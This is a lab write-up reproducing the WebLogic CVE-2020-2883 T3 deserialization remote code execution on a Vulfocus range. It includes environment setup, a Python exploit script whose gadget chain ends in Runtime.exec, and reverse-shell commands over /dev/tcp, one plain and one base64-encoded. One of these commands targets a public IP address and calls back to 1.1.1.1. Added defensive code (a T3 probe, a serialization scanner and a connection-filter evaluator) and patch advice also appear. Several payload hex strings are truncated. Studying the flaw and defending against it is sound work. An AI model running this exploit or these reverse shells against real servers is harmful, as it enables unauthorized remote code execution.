Reproducing the WebLogic CVE-2020-2883 vulnerability with Vulfocus
Vulnerability overview
In Oracle's April 2020 Critical Patch Update (CPU), two critical WebLogic Server vulnerabilities rated CVSS 3.0 9.8 (CVE-2020-2883 and CVE-2020-2884) allow an unauthenticated attacker with network access over the T3 protocol to compromise a vulnerable WebLogic Server. Successful exploitation gives the attacker control of the server, i.e. remote code execution. Both are Java deserialization flaws: the T3 listener deserializes attacker-supplied objects, and the gadget chain used by the PoC below ends in java.lang.Runtime.exec.
Affected versions
Oracle WebLogic Server 10.3.6.0.0
Oracle WebLogic Server 12.1.3.0.0
Oracle WebLogic Server 12.2.1.3.0
Oracle WebLogic Server 12.2.1.4.0
Environment setup
We use the Vulfocus range to bring up the vulnerable environment with one click. Vulfocus is a vulnerability integration platform: drop in the Docker image of a vulnerable environment and it is ready to use out of the box.
After installing Vulfocus, open its web UI and start the Docker target (the 192.168.109.136 address shown in the screenshot is a display bug; the actual address is 192.168.109.140).
From the server 192.168.1.111 we can reach 192.168.109.140:50281 and confirm the WebLogic target is up.
The topology shows the VM is deployed in NAT mode, so the attack machine cannot reach the WebLogic service directly; we add a port-forwarding rule on the virtual NIC (the exploit below reaches the service as 192.168.1.111:7001).
The attack machine 192.168.1.236 can now reach the WebLogic service.
With that, a complete WebLogic target environment is ready.
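Before firing the exploit (or after applying the T3 workaround at the end of this post) it is useful to check what the port actually speaks. The following probe is an added example, not part of the original post: it sends the same T3 client hello that the PoC below sends and parses the server's HELO reply. The sample reply, the target host and port, and the interpretation of an accept-then-close as a filtered connection are assumptions.

```python
import re
import socket

# T3 client hello, as sent by the PoC in this post (decoded from its hex):
# protocol version, then the AS/HL/MS negotiation parameters.
T3_HELLO = b"t3 12.2.1\nAS:255\nHL:19\nMS:10000000\n\n"

# Constructed sample of a WebLogic reply: "HELO:<version>.<secure-flag>" plus
# the negotiated parameters. Not captured from a real server.
SAMPLE_REPLY = b"HELO:12.2.1.3.0.false\nAS:2048\nHL:19\nMS:10000000\n\n"

# Versions listed as affected in this post. A version match alone does not
# prove the April 2020 CPU is missing: PSU patches do not change this string.
AFFECTED = {"10.3.6.0.0", "12.1.3.0.0", "12.2.1.3.0", "12.2.1.4.0"}


def parse_t3_helo(data):
    """Return (version, tls_flag) from a T3 HELO reply, or None if data is not one."""
    m = re.match(rb"HELO:(\d+(?:\.\d+)*)\.(true|false)", data)
    if not m:
        return None
    return m.group(1).decode(), m.group(2) == b"true"


def is_listed_affected(version):
    return version in AFFECTED


def probe_t3(host, port, timeout=5.0):
    """Connect, send the T3 hello and classify what comes back.

    Returns a (status, detail) pair:
      ("t3", version)      the port speaks T3 and reported its version
      ("closed", None)     TCP connect succeeded but the server dropped us after the
                           hello, which is typically what a connection filter deny
                           rule looks like from the outside
      ("other", bytes)     something answered, but not with a T3 HELO (e.g. HTTP)
      ("refused"/"error", detail)  no connection at all
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(T3_HELLO)
            data = s.recv(1024)
    except ConnectionRefusedError:
        return ("refused", None)
    except OSError as e:
        return ("error", str(e))
    if not data:
        return ("closed", None)
    parsed = parse_t3_helo(data)
    if parsed:
        return ("t3", parsed[0])
    return ("other", data[:32])


if __name__ == "__main__":
    # Assumed target from this post's setup; adjust host and port as needed.
    status, detail = probe_t3("192.168.1.111", 7001)
    print(status, detail)
    if status == "t3":
        print("version listed as affected:", is_listed_affected(detail))
```

Run it once before the exploit (expect "t3" and the version) and again from an untrusted host after the connection filter is in place (expect "closed").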
Reproduction
First, the PoC:
# -*- coding: utf-8 -*-
# PoC for CVE-2020-2883: deliver a serialized Java gadget chain (ending in
# java.lang.Runtime.exec) to a WebLogic server over the T3 protocol.
# Python 3 version of the script in the original post. Several hex payload
# strings are truncated in the original and are kept as they appear there.
import argparse
import binascii
import socket
import ssl
import time
from urllib.parse import urlparse

globalProxies = {}
header = {
    'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0"
}


def parseUrl(url):
    # The commands below pass "host:port/" without a scheme; urlparse only
    # fills in netloc when a scheme is present, so default to http.
    if '://' not in url:
        url = 'http://' + url
    parsed = urlparse(url)
    proto = parsed.scheme
    netloc = parsed.netloc
    ip = netloc
    if proto == 'http':
        port = 80
    else:
        port = 443
    if ':' in netloc:
        ip = netloc.split(':')[0]
        port = netloc.split(':')[1]
    uri = parsed.path
    return (proto, ip, port, uri)


def CVE_2020_2883(cmd):
    # Serialized java.util.PriorityQueue gadget chain. The command is embedded
    # as a Java UTF string (2-byte big-endian length, then the bytes); the tail
    # names the method "exec" and the class java.lang.Runtime.
    payload_start = 'aced0005737200176a6176612e7574696c2e5072696f72697479517565756594da30b4fb3f82b103000249000473697a654c000a636f6d70617261746f727400164c6a6176612f757'  # truncated in the original post
    payload_lenhex = '{:04x}'.format(len(cmd.encode()))
    payload_cmdhex = binascii.b2a_hex(cmd.encode()).decode()
    payload_end = '74000465786563770400000003767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707400013178'
    payload = payload_start + payload_lenhex + payload_cmdhex + payload_end
    return payload


class payloadtest(object):
    def __init__(self):
        self.vuln = 'cve_2020_2883'

    def t3handshake(self, sock, server_addr):
        # Connect and send the T3 client hello:
        # "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\n\n"
        sock.connect(server_addr)
        sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'))
        time.sleep(1)
        data = sock.recv(1024)
        # print(data)  # the server answers with a HELO line carrying its version
        # print('handshake successful')

    def buildT3RequestObject(self, sock, port):
        # T3 request frames that precede the malicious object.
        # data1 and data2 are truncated in the original post.
        data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a0000000300000000000'
        data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b427872002477656'
        data3 = '1a7727000d3234322e323134'
        data4 = '2e312e32353461863d1d0000000078'
        for d in [data1, data2, data3, data4]:
            sock.send(bytes.fromhex(d))
            time.sleep(2)
        # print('send request payload successful, recv length:%d' % len(sock.recv(2048)))

    def sendEvilObjData(self, sock, data):
        # Wrap the gadget chain in a T3 message. The leading 4 bytes are the
        # total length: the payload bytes plus the length field itself.
        payload = '056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9b'  # truncated in the original post
        payload += data
        payload += 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e72'  # truncated in the original post
        payload = '{:08x}{}'.format(len(payload) // 2 + 4, payload)
        sock.send(bytes.fromhex(payload))
        time.sleep(2)
        sock.send(bytes.fromhex(payload))
        res = b''
        n = 1
        try:
            while True:
                n += 1
                res += sock.recv(4096)
                time.sleep(0.1)
                if n > 15:
                    break
        except Exception:
            pass
        return res

    def check(self, url, cmd, timeout, proxies=globalProxies, **args):
        (proto, ip, port, uri) = parseUrl(url)
        server_addr = (ip, int(port))
        raw = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        if proto == 'https':
            # t3s: wrap the socket in TLS without verifying the server certificate
            ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
            ctx.check_hostname = False
            ctx.verify_mode = ssl.CERT_NONE
            sock = ctx.wrap_socket(raw)
        else:
            sock = raw
        sock.settimeout(timeout)
        try:
            self.t3handshake(sock, server_addr)
            self.buildT3RequestObject(sock, port)
            payload = CVE_2020_2883(cmd)
            resp = self.sendEvilObjData(sock, payload)
            print('Payload send succeed! Please check.')
            return True
        except Exception as e:
            print('Failed! Exception:{}'.format(str(e)))
            return False
        finally:
            sock.close()


def poc(url, cmd):
    x = payloadtest()
    return x.check(url, cmd, 20)


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Weblogic cve-2020-2883 Exp',
                                     usage='use "python %(prog)s --help" for more information',
                                     formatter_class=argparse.RawTextHelpFormatter)
    parser.add_argument("-u", "--url",
                        dest="url",
                        help="the url to check"
                        )
    parser.add_argument("-c", "--cmd",
                        dest="cmd",
                        help="the cmd to run on the target"
                        )
    args = parser.parse_args()
    if args.url and args.cmd:
        poc(args.url, args.cmd)
    else:
        parser.print_help()
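The object the PoC sends starts with the Java serialization magic aced0005 and names java.util.PriorityQueue, the string exec and java.lang.Runtime, all readable in the hex above. As an added example (not from the original post), the following triage scanner pulls class descriptors and string constants out of a captured buffer and flags the classes this chain uses; a defender can run it over T3 traffic or a packet capture. The sample buffer is constructed from the PoC's own fragments and is not a complete or loadable object stream; the blocklist is an assumption to extend.

```python
import re

# java.io.ObjectStreamConstants values that matter here
STREAM_MAGIC = b"\xac\xed\x00\x05"
TC_CLASSDESC = 0x72   # followed by a class name as a Java UTF string
TC_STRING = 0x74      # followed by a Java UTF string constant

# Classes named by the PoC's gadget chain; seeing them arrive over T3 from an
# untrusted host is worth an alert. Assumed starting blocklist, extend as needed.
SUSPICIOUS_CLASSES = {"java.util.PriorityQueue", "java.lang.Runtime"}


def _utf(s):
    """Java UTF encoding as used in object streams: 2-byte big-endian length, then bytes."""
    return len(s).to_bytes(2, "big") + s.encode()


# Constructed sample assembled from the fragments visible in the PoC above
# (PriorityQueue class descriptor with its two fields, the "exec" string, the
# Runtime class). It is not a complete object stream.
SAMPLE_STREAM = (
    STREAM_MAGIC
    + b"\x73\x72" + _utf("java.util.PriorityQueue") + bytes.fromhex("94da30b4fb3f82b1")
    + b"\x03\x00\x02" + b"\x49" + _utf("size") + b"\x4c" + _utf("comparator")
    + b"\x74" + _utf("Ljava/util/Comparator;")
    + b"\x74" + _utf("exec")
    + b"\x76\x72" + _utf("java.lang.Runtime")
    + b"\x74" + _utf("1") + b"\x78"
)

_NAME = re.compile(r"[A-Za-z0-9_.$\[;/ -]+")


def _utf_after(data, pos):
    """Read a plausible Java UTF string at pos, or return None."""
    if pos + 2 > len(data):
        return None
    n = int.from_bytes(data[pos:pos + 2], "big")
    raw = data[pos + 2:pos + 2 + n]
    if n == 0 or len(raw) != n:
        return None
    try:
        s = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return s if _NAME.fullmatch(s) else None


def extract_java_serialization(data):
    """Triage scanner, not an ObjectInputStream: reports whether the stream magic
    is present and lists class names (after TC_CLASSDESC) and string constants
    (after TC_STRING) that decode as plausible Java UTF strings. Random bytes
    that happen to be 0x72/0x74 are rejected because their length prefix does
    not fit the buffer or the bytes are not printable ASCII."""
    has_magic = STREAM_MAGIC in data
    classes, strings = [], []
    i = 0
    while i < len(data) - 2:
        tag = data[i]
        if tag in (TC_CLASSDESC, TC_STRING):
            s = _utf_after(data, i + 1)
            if s is not None:
                (classes if tag == TC_CLASSDESC else strings).append(s)
                i += 3 + len(s)
                continue
        i += 1
    return has_magic, classes, strings


def flag_suspicious(data):
    """Return (has_magic, sorted suspicious class names, string constants) for a buffer."""
    has_magic, classes, strings = extract_java_serialization(data)
    return has_magic, sorted(set(classes) & SUSPICIOUS_CLASSES), strings


if __name__ == "__main__":
    print(flag_suspicious(SAMPLE_STREAM))
```

In practice the magic and a Runtime class descriptor arriving on the T3 port from outside the trusted client set is the signal; the exact gadget class changes between CVE-2020-2555, 2883 and later bypasses, so alert on the stream magic plus any blocklisted class rather than on one chain.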
First start an nc listener: nc -lvvp 19999
Run the exploit script to get a reverse shell:
python weblogic-2883.py -u 188.40.189.135:18048/ -c "bash -i >& /dev/tcp/1.1.1.1/19999 0>&1"
The script reports that the payload was sent, but the listener never receives a shell. Searching online showed that the reverse-shell command has to be encoded. The reason is in the gadget chain: it calls Runtime.exec with the command as a single string, which Java splits on whitespace and runs without a shell, so >& and 0>&1 arrive as literal arguments of bash instead of being interpreted as redirections. Wrapping the base64 of the command in bash brace expansion (encoded with an online tool; the base64 below decodes to bash -i >& /dev/tcp/192.168.1.236/19999 0>&1) leaves no whitespace for Java to split on and lets bash -c do the interpretation:
python weblogic-2883.py -u 192.168.1.111:7001/ -c "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMjM2LzE5OTk5IDA+JjE=}|{base64,-d}|{bash,-i}"
As the screenshot shows, the reverse shell connects back; listing /tmp/ yields the flag.
Remediation
1. Official fix
Oracle has released patches for these vulnerabilities. Refer to the official advisory, download the patch for the affected product and install it as described in the README in the patch package for lasting protection.
2. Temporary workaround
Restricting access to the T3 protocol temporarily blocks attacks against these vulnerabilities. Steps:
1. In the WebLogic console, open the configuration page of base_domain, go to the Security tab, click Filter and open the connection filter settings.
2. Enter weblogic.security.ConnectionFilterImpl as the connection filter and, following the pattern below, write connection filter rules that fit your environment (rules are evaluated in order and the first match wins, so the catch-all deny goes last):
127.0.0.1 * * allow t3 t3s
<server IP> * * allow t3 t3s
<allowed client IP> * * allow t3 t3s
* * * deny t3 t3s
3. If the rules do not take effect after saving, restart the WebLogic service (a restart interrupts the application, so assess the risk before doing so).
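To see what such a rule set actually permits before restarting production, here is an added example (my own code, not WebLogic's and not from the original post) that models the connection filter's documented first-match evaluation: rules are checked in order, the first one whose target, local address, local port and protocol all match decides, and a connection matching no rule is allowed. The IPs filled into the placeholders and the deny-first variant are assumptions; hostname targets, which WebLogic resolves, are only compared as strings here.

```python
import ipaddress

# The rule set from step 2, with the placeholders filled in for a hypothetical
# deployment: WebLogic listens on 192.168.1.111:7001 and 192.168.1.236 is the
# one client allowed to use T3. Fields: target localAddress localPort action protocols
RULES = """
127.0.0.1      * * allow t3 t3s
192.168.1.111  * * allow t3 t3s
192.168.1.236  * * allow t3 t3s
*              * * deny  t3 t3s
"""

# Same intent with the deny line first: the allow below it is never reached.
RULES_DENY_FIRST = """
*              * * deny  t3 t3s
192.168.1.236  * * allow t3 t3s
"""


def parse_rules(text):
    """Parse rule lines into (target, local_addr, local_port, action, protocols).
    An empty protocol set means the rule applies to every protocol."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) < 4 or parts[3] not in ("allow", "deny"):
            raise ValueError("malformed rule: %r" % line)
        target, local_addr, local_port, action = parts[:4]
        rules.append((target, local_addr, local_port, action, frozenset(parts[4:])))
    return rules


def _target_matches(target, remote_ip):
    """target is '*', a single IP, or address/mask (CIDR or dotted mask).
    Anything that is not an address is treated as a hostname and compared as text."""
    if target == "*":
        return True
    ip = ipaddress.ip_address(remote_ip)
    try:
        if "/" in target:
            return ip in ipaddress.ip_network(target, strict=False)
        return ip == ipaddress.ip_address(target)
    except ValueError:
        return target == remote_ip


def evaluate(rules, remote_ip, protocol, local_addr="192.168.1.111", local_port=7001):
    """Decide allow/deny the way ConnectionFilterImpl is documented to: walk the
    rules in order; the first one whose target, local address, local port and
    protocol all match wins; a connection matching no rule is allowed."""
    for target, laddr, lport, action, protocols in rules:
        if not _target_matches(target, remote_ip):
            continue
        if laddr != "*" and laddr != local_addr:
            continue
        if lport != "*" and int(lport) != local_port:
            continue
        if protocols and protocol not in protocols:
            continue
        return action
    return "allow"


if __name__ == "__main__":
    rules = parse_rules(RULES)
    for ip, proto in [("192.168.1.236", "t3"), ("10.0.0.9", "t3"), ("10.0.0.9", "http")]:
        print(ip, proto, "->", evaluate(rules, ip, proto))
    print("deny-first, allowed client over t3 ->",
          evaluate(parse_rules(RULES_DENY_FIRST), "192.168.1.236", "t3"))
```

Two things the output makes visible: http from an arbitrary host is still allowed, because no rule names it and the default is allow, so the application keeps working; and with the deny line first even the listed client is denied, which is the lock-out to avoid when editing the rules in the console.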